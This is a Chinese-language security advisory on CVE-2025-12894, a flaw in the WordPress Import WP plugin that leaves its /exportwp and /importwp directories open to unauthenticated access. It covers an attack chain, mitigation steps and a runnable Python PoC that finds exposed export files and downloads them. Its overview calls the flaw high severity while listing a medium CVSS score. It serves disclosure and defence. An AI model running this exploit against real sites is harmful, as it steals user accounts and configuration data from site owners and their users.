CVE-2025-12894: WordPress Import WP插件敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-12894

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Import WP – Export and Import CSV and XML files to WordPress (≤2.14.17)

漏洞概述

CVE-2025-12894是WordPress插件"Import WP – Export and Import CSV and XML files to WordPress"中的一个高危安全漏洞。该插件用于在WordPress网站中导入和导出CSV/XML文件。漏洞源于插件的导入/导出功能存在设计缺陷，缺少适当的访问控制机制和.htaccess文件保护。具体而言，插件将导出的敏感数据文件存储在/exportwp目录，将待导入的数据存储在/importwp目录，但这两个目录缺乏有效的访问限制。这使得未经身份认证的远程攻击者可以直接访问这些目录，窃取包含用户信息、配置数据等敏感内容的导出文件，甚至向/importwp目录注入恶意数据。由于该插件广泛应用于各类WordPress网站，此漏洞可能影响大量使用此插件进行数据迁移和备份的网站。

技术细节

该漏洞的根本原因在于插件未对/exportwp和/importwp目录实施任何访问控制。这两个目录通常包含插件执行导入导出操作时生成的临时文件和最终文件。攻击者可以通过构造简单的HTTP请求直接访问这些目录，无需任何认证即可获取目录列表并下载其中的文件。导出的文件可能包含：用户账户信息、帖子内容、媒体文件引用、插件配置数据、主题设置等敏感信息。同时，攻击者也可以向/importwp目录上传恶意构造的数据文件，利用插件的导入功能将恶意内容注入到WordPress数据库中。攻击成功的关键在于目标服务器未正确配置.htaccess文件来限制对这些目录的直接访问，且插件本身也未实现基于nonce或权限验证的访问控制机制。

攻击链分析

STEP 1

步骤1

探测目标：攻击者首先访问目标WordPress站点的/exportwp和/importwp目录，通过目录列表或直接请求验证这些敏感目录是否可访问

STEP 2

步骤2

信息收集：利用目录遍历或直接访问，攻击者获取导出的数据文件列表，识别包含敏感信息的文件（如用户数据、配置备份等）

STEP 3

步骤3

数据窃取：攻击者下载/exportwp目录中的CSV/XML导出文件，获取用户账户信息、帖子内容、插件配置等敏感数据

STEP 4

步骤4

恶意注入（可选）：攻击者将包含恶意代码或垃圾内容的文件上传到/importwp目录，诱导管理员通过插件的导入功能将其导入WordPress系统

STEP 5

步骤5

后续利用：窃取的敏感信息可用于账户劫持、社会工程攻击或进一步渗透；注入的恶意内容可能用于SEO垃圾链接或存储型XSS攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12894 PoC - WordPress Import WP Sensitive Information Exposure
# Target: WordPress site with Import WP plugin <= 2.14.17

import requests
import sys
from urllib.parse import urljoin

def check_vulnerability(base_url):
    """Check if the target is vulnerable to CVE-2025-12894"""
    
    # Check exportwp directory
    export_url = urljoin(base_url, '/exportwp/')
    import_url = urljoin(base_url, '/importwp/')
    
    results = {
        'exportwp_accessible': False,
        'importwp_accessible': False,
        'exported_files': [],
        'imported_files': []
    }
    
    try:
        # Try to access exportwp directory
        response = requests.get(export_url, timeout=10, verify=False)
        if response.status_code == 200:
            results['exportwp_accessible'] = True
            print(f"[+] exportwp directory is accessible at: {export_url}")
            
            # Try to enumerate files (basic listing check)
            if 'index of' in response.text.lower() or '<title>index of' in response.text.lower():
                print(f"[!] Directory listing is enabled - sensitive files may be exposed")
                # Extract file references from response
                import re
                files = re.findall(r'href=["\'](.*?)["\']', response.text)
                results['exported_files'] = [f for f in files if f.endswith(('.csv', '.xml', '.json'))]
        
        # Try to access importwp directory
        response = requests.get(import_url, timeout=10, verify=False)
        if response.status_code == 200:
            results['importwp_accessible'] = True
            print(f"[+] importwp directory is accessible at: {import_url}")
            
            if 'index of' in response.text.lower() or '<title>index of' in response.text.lower():
                print(f"[!] Directory listing is enabled - import files may be exposed")
                import re
                files = re.findall(r'href=["\'](.*?)["\']', response.text)
                results['imported_files'] = [f for f in files if f.endswith(('.csv', '.xml', '.json'))]
        
        return results
        
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def download_exported_data(base_url, output_dir='./exfiltrated_data'):
    """Download exported files from vulnerable endpoint"""
    import os
    os.makedirs(output_dir, exist_ok=True)
    
    export_url = urljoin(base_url, '/exportwp/')
    
    try:
        response = requests.get(export_url, timeout=10, verify=False)
        if response.status_code == 200:
            import re
            files = re.findall(r'href=["\']([^"\']+\.(csv|xml|json))["\']', response.text)
            
            for filename, _ in files:
                file_url = urljoin(export_url, filename)
                print(f"[*] Downloading: {file_url}")
                
                file_response = requests.get(file_url, timeout=30, verify=False)
                if file_response.status_code == 200:
                    local_path = os.path.join(output_dir, filename)
                    with open(local_path, 'wb') as f:
                        f.write(file_response.content)
                    print(f"[+] Saved to: {local_path}")
                    
    except Exception as e:
        print(f"[-] Download error: {e}")

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_12894_poc.py <target_url>")
        print("Example: python cve_2025_12894_poc.py http://example.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    print(f"[*] Checking target: {target}")
    print(f"[*] Testing CVE-2025-12894 vulnerability...\n")
    
    results = check_vulnerability(target)
    
    if results:
        if results['exportwp_accessible'] or results['importwp_accessible']:
            print("\n[!] VULNERABLE - Sensitive directories are exposed")
            print("\n[*] Attempting to download exported data...")
            download_exported_data(target)
        else:
            print("\n[-] Target appears to be patched or not vulnerable")

影响范围

Import WP (jc-importer) ≤ 2.14.17

防御指南

临时缓解措施

立即在/exportwp和/importwp目录添加.htaccess保护文件，内容应包含"Deny from all"或配置Apache/Nginx规则拒绝直接访问这些目录。同时将Import WP插件升级到2.14.18或更高版本。如暂时无法升级，可考虑暂时禁用该插件的导入导出功能，或通过防火墙规则阻止对这两个目录的外部访问。